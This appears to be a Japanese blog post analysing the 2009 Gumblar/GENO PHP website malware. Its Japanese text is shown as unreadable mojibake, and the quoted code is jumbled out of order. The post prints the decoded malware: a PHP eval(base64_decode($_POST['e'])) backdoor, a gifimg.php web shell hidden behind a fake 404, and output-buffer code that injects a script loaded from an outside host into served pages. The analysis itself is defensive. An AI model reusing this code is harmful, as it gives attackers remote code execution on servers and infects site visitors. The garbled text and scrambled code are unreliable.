|
£±£°·î£¹Æü¤´¤í¤ËȯÀ¸¤·¤¿¡¢¿·¼ï¤ÎPHP¤Î¥¦¥¤¥ë¥¹ ¡ÖGumblar.x¡×¡ÖJSRedir-R¡×¡ÊÄ̾Ρ¢GENO¥¦¥¤¥ë¥¹¡Ë ¤Î¡Ö¤ä¤é¤ì£²·²¡×¤Îµóư¤Ë¤Ä¤¤¤Æ¤Î¡¢Â³Êó¤Ç¤¹¡£ ¤Ê¤ª¡¢ ¤ò¤´Í÷²¼¤µ¤¤¡£ ¡ãÄɵ¡ä PHP¤Î¥³¡¼¥É¤Î¥¤¥ó¥Ç¥ó¥È¤¬¤ª¤«¤·¤¤¤Î¤ò½¤Àµ¤¤¤¿¤·¤Þ¤·¤¿¡£¡¡(09/10/30) PHP¤Ë´¶À÷¤¹¤ë¥³¡¼¥É¤Ï£²¼ïÎढ¤ê¤Þ¤¹¡£¤È¤â¤Ë base64¥¨¥ó¥³¡¼¥É¤µ¤ì¤ÆÆñÆÉ²½¤µ¤ì¤Æ¤¤¤Þ¤¹¡£ ¥Ç¥³¡¼¥É¤·¤¿¤â¤Î¤ò¼¨¤·¤Þ¤¹¤È¼¡¤Î¤è¤¦¤Ê¤â¤Î¤Ç¤¹¡§ if(!isset($a1i81)) {
function a1i8($s) {
}
if(preg_match_all('#<script(.*?)</script>#is',$s,$a))
}
foreach($a[0] as $v)
if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http
if(count(explode("\n",$v))>5) {
$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\
} ]{30,}#',$v) || preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v) && ($e || strpos($v,'fromCharCode'))) || ($e&&strpos($v,'document.write')))
$s=str_replace($v,'',$s);
?//([^>]*?)>#is',$s,$a))
foreach($a[0] as $v)
$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL2luY2FicmFzaWwub3JnLmJyL2FkbWluL3VwbG9hZF9pbWFnZW5zL2FkbWluc3VwZXJuZXdzLnBocCA+PC9zY3JpcHQ+'),'',$s);
if(preg_match('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i',$v) && !strstr($v,'?'.'>'))
$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);
if(stristr($s,'<body'))
$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s);
elseif(strpos($s,',a'))
$s.=$a;return $s;
function a1i82($a,$b,$c,$d) {
global $a1i81;
}$s=array(); if(function_exists($a1i81))
call_user_func($a1i81,$a,$b,$c,$d);
foreach(@ob_get_status(1) as $v)
if(($a=$v['name'])=='a1i8')
for($i=count($s)-1;$i>=0;$i--){
return;
elseif($a=='ob_gzhandler')
break;
else
$s[]=array($a=='default output handler'?false:$a);
$s[$i][1]=ob_get_contents();
}ob_end_clean(); ob_start('a1i8'); for($i=0;$i<count($s);$i++){
ob_start($s[$i][0]);
}echo $s[$i][1]; $a1i8l=(($a=@set_error_handler('a1i82'))!='a1i82')?$a:0; eval(base64_decode($_POST['e'])); ¤º¤é¤º¤é¡¢¤¢¤ê¤Þ¤¹¤¬¡¢¼Â¤Ï¡¢´Ø¿ô¤òÄêµÁ¤·¤Æ¤¤¤ë¤À¤±¤Ç¤¹¡£ ËÜÂΤϡ¢ºÇ¸å¤Î£²¹Ô¤À¤±¤Ç¤¹¡£ ¤â¤Ã¤È¤¤¤¨¤Ð¡¢¼ÂºÝ¤Îưºî¤ò¤¹¤ëÉôʬ¤Ï¡¢°ìÈֺǸå¤Î¹Ô ¡¡?b>eval(base64_decode($_POST['e'])); ¤Ê¤Î¤Ç¤¹¡£ ¤³¤Î¹Ô¤Ï¡¢ ¡¡¡¡POST ¥á¥½¥Ã¥É¤Ç¡¢¤³¤Î php ¥Õ¥¡¥¤¥ë¤¬¸Æ¤Ð¤ì¤¿ºÝ¤Ë¡¢
¤È¤¤¤¦¤â¤Î¤Ç¤¹¡£¡¡¡¡FORM¤Î e¤Î¥Ñ¥é¥á¡¼¥¿¤Ë½ñ¤«¤ì¤Æ¤¤¤ë php¤Î¥³¡¼¥É¤ò(base64¥¨¥ó¥³¡¼¥É¤·¤Æ¤¢¤ë¤Î¤òÌᤷ¤Æ¡Ë ¡¡¡¡¡Ö¤½¤Î¤Þ¤Þ¼Â¹Ô¤»¤è¡× ¤è¤¦¤¹¤ë¤Ë¡¢Ç¤°Õ¤Î php ¤Î¥³¡¼¥É¤ò¼Â¹Ô¤¹¤ë ¤È¤¤¤¦¥³¡¼¥É¤Ç¤¹¡£ ¤ª¤½¤é¤¯¡¢¤½¤Î¥³¡¼¥É¤ÎÃæ¤«¤é¡¢¤³¤³¤ÇÄêµÁ¤·¤¿£²¤Ä¤Î´Ø¿ô¡¢ ¡¡¡¡function a1i8($s) ¡¡¡¡function a1i82($a,$b,$c,$d) ¤¬¤è¤Ó¤À¤µ¤ì¡¢ÊÑ¿ô¤Ç¤¢¤ë ¡¡¡¡$a1i8l ¤¬ÍøÍѤµ¤ì¤ë¡¢¤È¤¤¤¦É÷¤Ë¤Ê¤Ã¤Æ¤¤¤ë¤â¤Î¤È»×¤ï¤ì¤Þ¤¹¡£ ¤Ê¤ª¡¢ base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL2luY2FicmFzaWwub3JnLmJyL2FkbWluL3VwbG9hZF9pbWFnZW5zL2FkbWluc3VwZXJuZXdzLnBocCA+PC9zY3JpcHQ+')
¤ÎÉôʬ¤Ï¡¢¥Ç¥³¡¼¥É¤¹¤ë¤È¡¢<script src=£è£ô£ô£ð://incabrasil.org.br/admin/upload_imagens/adminsupernews.php ></script>
¤È¤Ê¤Ã¤Æ¤¤¤Þ¤¹¡£gifimg.php ¤È¤¤¤¦¥Õ¥¡¥¤¥ë¤ÎÃæ¿È¤â¡¢base64 ¥¨¥ó¥³¡¼¥É¤µ¤ì¤Æ¤¤¤Þ¤¹¤¬¡¢¤½¤ÎÃæ¿È¤Ï < ? php if(isset($_POST['e']))eval(base64_decode($_POST['e']));else die('404 Not Found'); ?>
¤È¤¤¤¦¤â¤Î¤Ç¤¹¡£¤³¤ì¤Ï¡¢Ä̾ï¤Ï¡¢¥Õ¥¡¥¤¥ë¤¬¸«Åö¤¿¤é¤Ê¤¤¤È¤¤¤¦¡¢404¥¨¥é¡¼¤ò½Ð¤·¤Æ¤ª¤¡¢ ¡¡¡¡POST ¥á¥½¥Ã¥É¤Ç¡¢¤³¤Î php ¥Õ¥¡¥¤¥ë¤¬¸Æ¤Ð¤ì¤¿ºÝ¤Ë¡¢
¤È¤¤¤¦¤â¤Î¤Ç¤¹¡£¡¡¡¡FORM¤Î e¤Î¥Ñ¥é¥á¡¼¥¿¤¬¤¢¤ë¾ì¹ç¤À¤±¡¢ ¡¡¡¡FORM¤Î e¤Î¥Ñ¥é¥á¡¼¥¿¤Ë½ñ¤«¤ì¤Æ¤¤¤ë php¤Î¥³¡¼¥É¤ò(base64¥¨¥ó¥³¡¼¥É¤·¤Æ¤¢¤ë¤Î¤òÌᤷ¤Æ¡Ë ¡¡¡¡¡Ö¤½¤Î¤Þ¤Þ¼Â¹Ô¤»¤è¡× ¤³¤ì¤â¡¢Ç¤°Õ¤Î php ¤Î¥³¡¼¥É¤ò¼Â¹Ô¤¹¤ë ¤È¤¤¤¦¥³¡¼¥É¤Ç¤¹¡£ ¤³¤ì¤é£²¤Ä¤Î¥³¡¼¥É¤«¤é¸À¤¨¤ë¤³¤È¤Ï¡¢ ¡¡¡¦¼ÂºÝ¤Î¥µ¡¼¥Ð¡¼Æâ¤Î¥Õ¥¡¥¤¥ë½ñ¤´¹¤¨¤ò¼Â¹Ô¤¹¤ë¥³¡¼¥É¤Ï¡¢¤³¤ÎÃæ¤Ë¤Ê¤¤¤È¤¤¤¦¤³¤È ¡¡¡¦³°Éô¤«¤éǤ°Õ¤Î php ¤Î¥³¡¼¥É¤ò¼Â¹Ô¤Ç¤¤ë¥³¡¼¥É¤¬Ëä¤á¹þ¤Þ¤ì¤Æ¤¤¤ë¤È¤¤¤¦¤³¤È ¤Î£²ÅÀ¤Ç¤¹¡£ ¼ÂºÝ¤Îµóư¤Ë¤Ï¡¢log¥Õ¥¡¥¤¥ë¤Ê¤É¤«¤é¡¢POST¥á¥½¥Ã¥É¤Î¥Ñ¥é¥á¡¼¥¿ ¤ò³Îǧ¤»¤Í¤Ð¤Ê¤ê¤Þ¤»¤ó¡£ ¤·¤«¤·¡¢Ä̾log¥Õ¥¡¥¤¥ë¤Ë¤Ï¡¢POST¥á¥½¥Ã¥É¤Î¥Ñ¥é¥á¡¼¥¿¤Ï¡¢»Ä¤·¤Æ¤¤¤Ê¤¤¤È¡¦¡¦¡¦ ¡¡¡¡¤Ê¤«¤Ê¤«¡¡¤ä¤ë¤Ê
¢¨Base64¤Î¥Ç¥³¡¼¥É¤Ë¤Ï¡¢ ¡¡¡¡¡¡http://hogehoge.tk/tool/ ¤ò»È¤¤¤Þ¤·¤¿¡£WEB¾å¤Î¥Õ¥©¡¼¥à¤Ç¡¢¥Ç¥³¡¼¥É¤·¤Æ¤¯¤ì¤Þ¤¹¡£
|
ÃÏÀ¯³Ø¤È¶áÎÙ¹ñºÝ¾ðÀª
[ ¥ê¥¹¥È ]
]{30,}#',$v) || preg_match('#[\(\[](\s*\d+,){20,}#',$v);
?//([^>]*?)>#is',$s,$a))



